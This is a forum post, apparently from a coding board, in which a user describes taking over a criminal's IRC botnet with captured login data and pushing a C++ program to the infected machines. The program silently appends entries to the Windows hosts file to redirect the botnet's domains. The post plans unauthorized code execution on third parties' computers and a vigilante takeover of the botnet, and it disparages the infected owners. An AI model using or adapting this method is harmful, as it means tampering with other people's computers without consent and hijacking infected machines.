[Botnet] Simple redirect trick

Questions about programming languages and debugging
Post Reply
User avatar
ayu
Staff
Staff
Posts: 8109
Joined: 27 Aug 2005, 16:00
18
Contact:
Contact ayu

[Botnet] Simple redirect trick

Post by ayu »

In this case it was meant for an infected machine to redirect a bot to another network, thus taking over the whole botnet when pushing it to all clients. But for those not so familiar with code like this, it simply opens a file and writes to it.


This is connected to a topic I started a little while ago concerning a small botnet that was growing fast. I destroyed most of it but the guy is still at it to make it grow again.

I got a hold of the updated version of his bot, thus getting his new login data to the bots (it's a simple IRC botnet, thus the data is sent in clear text).

My last attempt to redirect the bots to another network failed as it would seem that the guy controlling the bots has disabled a lot of features to make the bots stay where they are. But he didn't remove the download function in them so that he can keep updating them.

So, I intend to make them download this small program, it's just about as simple as it gets, but does huge damage to his botnet (no need to make it harder then it really is).

It simply adds two rows in the victims host file, making the bots resolve his domain to whatever IP I specify. The only problem is that I need to find a server where I wont be disturbed, and that doesn't have a dynamic IP (not sure, but quakenet.org maybe?)

The first plan was to save the victims computers by removing the bot, but after having a conversation with an owner of one of the infected machines (refer to the other botnet topic), I kind of lost hope for a while now. The bot was removed from that machine, but it was infected with a bunch of other stuff that made it almost useless, forcing the owner to eventually get help from someone to reinstall it.

People are too stupid when they are using their machines. So I intend to use the botnet to take down the creator of it instead (the creation beats its creator, heh).

Code: Select all

#include <iostream>
#include <fstream>

using namespace std;

int main()
{
	//Initialize some shiny constants
	const char _IP1_[16]		= "xxx.xxx.xxx.xxx";
	const char _IP2_[16]		= "xxx.xxx.xxx.xxx";
	const char _DOMAIN1_[256]	= "irc.evilbotnethost.com";
	const char _DOMAIN2_[256]	= "evilbotnethost.com";

	//Write to host file
	fstream file("C:/Windows/System32/drivers/etc/hosts", ios::out | ios::app);
	file << "\n" << _IP1_ << "\t" << _DOMAIN1_;
	file << "\n" << _IP2_ << "\t" << _DOMAIN2_;
	file.close();

	return 0;
}
"The best place to hide a tree, is in a forest"
Top
Post Reply

Return to “Coding”